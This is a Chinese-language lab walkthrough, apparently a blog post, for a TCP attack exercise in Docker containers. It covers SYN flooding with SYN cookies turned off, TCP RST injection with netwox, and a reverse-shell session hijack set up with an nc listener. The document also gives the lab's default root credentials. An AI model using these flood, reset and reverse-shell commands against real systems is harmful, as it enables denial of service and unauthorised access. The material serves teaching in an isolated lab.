赞
踩
上面的链接文章对于实验的多种实现方式(netwox工具、scapy脚本以及c语言的攻击实现)都有介绍,本文主要针对实验环境和步骤细节进行补充,所以所有的攻击只使用netwox工具实现。预祝大家实验顺利,顺利AC。
目录
- # 启用docker容器
-
- sudo docker exec -it $username$ /bin/bash
-
- # 重启docker容器
-
- sudo docker restart $username$
-
- # 重启telnet服务
-
- /etc/init.d/openbsd-inetd restart
-
- # 查看TCP SYN队列大小
-
- sysctl -q net.ipv4.tcp_max_syn_backlog
-
- # 查看内核重传次数
-
- sysctl -q net.ipv4.tcp_synack_retries
-
- # 查看syn cookies 开启状态
-
- sysctl -q net.ipv4.tcp_syncookies
-
- # 修改TCP SYN队列大小
-
- sysctl -w net.ipv4.tcp_max_syn_backlog=n
-
- # 修改内核重传次数
-
- sysctl -w net.ipv4.tcp_synack_retries=n
-
- # 修改syn cookies 开启状态
-
- sysctl -w net.ipv4.tcp_syncookies=0||1 # 0 : 关闭 1 : 开启
-
- # 开启wireshark
-
- sudo wireshark # 注意一定要sudo权限开启wireshark,否则看不到docker0接口的流量
-
-
-
-
-
-

实验有3个docker容器,分别为user(作为初始连接,IP 172.17.0.2),server(作为服务器和被攻击对象,IP 172.17.0.3),user2(作为攻击成功后的验证连接,IP 172.17.0.4),虚拟机本身(作为攻击者,IP 172.17.0.1),其中虚拟机开启后默认开启所有的docker,server默认开启telnet服务,登录用户名root,密码123456,并且默认开启tcp syn cookies。虚拟机开机密码:123456,串行控制台登录用户名:ubuntu
sudo netwox 76 -i 172.17.0.3 -p 23
实验环境中有2个docker容器,分别是user,IP172.17.0.2和server,IP172.17.0.3,其中user作为连接server的正常用户,server作为受害者,虚拟机本身IP172.17.0.1作为攻击者,虚拟机默认开启两个docker,server默认开启telnet服务,登录用户名root,密码123456.这里的攻击不建议使用手动单次攻击,单次攻击行为难以判定,平台没有实现对于单次攻击的自动化评测,所以建议使用netwox进行自动化攻击,或者使用scapy脚本循环发起攻击。
sudo netwox 78 -d docker0
会话劫持实验是反向shell的基础,这里只演示反向shell实验。
实验环境中有2个docker容器,分别是user,IP172.17.0.2和server,IP172.17.0.3,其中user作为连接server的正常用户,server作为受害者,虚拟机本身IP172.17.0.1作为攻击者,虚拟机默认开启两个docker,server默认开启telnet服务,登录用户名root,密码123456.这里的攻击需要使用到wireshark,注意使用命令行启动。
sudo nc -lvp 4567 -s 172.17.0.1
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。